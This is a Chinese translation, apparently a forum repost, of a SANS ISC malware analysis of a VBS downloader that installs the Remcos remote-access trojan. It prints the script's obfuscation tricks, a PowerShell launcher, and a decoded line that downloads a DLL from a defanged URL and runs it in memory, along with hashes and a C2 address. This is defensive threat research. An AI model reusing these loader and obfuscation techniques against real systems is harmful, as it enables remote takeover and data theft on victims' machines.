带有 Unicode 混淆的 Remcos 下载器
英文原文:https://isc.sans.edu/diary/29220我发现了一个包含 VBS 脚本的恶意 RAR 存档,名为 "Unidad Justice citacion pendiente Fiscalia.rar",用一个简单的 4 位密码保护以阻止自动扫描。在内部,VBS 脚本具有相同的名称。 两者都不为 VT 所知。
该文件具有愚蠢 (但仍然有效) 的技巧来污染代码,例如注释 (以单引号开头的行) 和标签 (以冒号结尾的行)。请注意,可以在一行中加入多个标签:
IzGPO:yWNxx:IOfaI:Cvghz:qfPU:aDHqa:LxWPC:ULLtt:YwPsT
VBS 脚本对一些代码进行去混淆处理并启动 PowerShell 解释器,主要数据是 Base64 编码的,但 unicode 字符被注入:
同样,许多工具都无法正确处理非常简单 unicode 字符,尤其是在 Linux 上。如果尝试在 Linux shell 中显示脚本,将看不到有趣的代码!
可疑函数被混淆并通过其他函数调用,该脚本有多个保留字符串。"StrReverse" 是这样处理的:
Function BgkX(GGMtp)
dim MDje
MDje = "BgkX = "
MDje = MDje + "SNdPZOtrNdPZORevNdPZOerse"
MDje = BeWD(MDje,"NdPZO","")
MDje = MDje + "(GGMtp)"
execute(MDje)
End Function
execute() 语句类似于 Javascript 中的 eval(),接受一个字符串参数并将其解释为 VBS 语句或语句序列
另一个混淆:
这是执行的 PowerShell 脚本 (美化):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command \
$iUqm = 'JABSAG8AZABhAEMAbwBwAHkAI (payload removed) AA9ACAAJwA???ASwBhAGIAJwAgACkAKQA='; \
$OWjuxD = ::Unicode.GetString( ::FromBase64String( $iUqm.replace('???','U') ) ); \
$OWjuxD = $OWjuxD.replace('??????????', 'C:\Users\user01\AppData\Local\Temp\Unidad judicial cita.vbs'); \
powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
下一个解码的 Base64 有效载荷 (也被垃圾字符污染) 是:
$RodaCopy = '–¯¯––¯––¯¯'; ] $DLL = ::FromBase64String((New-Object Net.WebClient).DownloadString('hxxps://tinyurl[.]com/2erph6cs'));::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, ] ('0/Ev3d1/d/ee.etsap//:sptth' , $RodaCopy , 'd3vEKab' ))
从 hxxps://tinyurl[.]com/2erph6cs (SHA255:49562fda46cfa05b2a6e2cb06a5d25711c9a435b578a7ec375f928aae9c08ff2) 下载 DLL。 它已经在 VT 上,得分为 40/69。 DLL 使用 AppDomain.Load 方法在当前进程中加载,并从反向 URL 启动 Remcos 示例 (SHA256: ee1e6615088a95b6d401603fc0f46b105a453eecbd8131305443983b6d32151f)。
C2 服务器是 deferos2.con-ip[.]com:2425。
几个月前我已经看到了这种感染技术,但它似乎仍然有效并且仍然在野外。 许多安全控件,尤其是在 Linux 上运行的安全控件,都存在正确处理 Unicide 字符的问题!
没看懂,太高深了
页:
[1]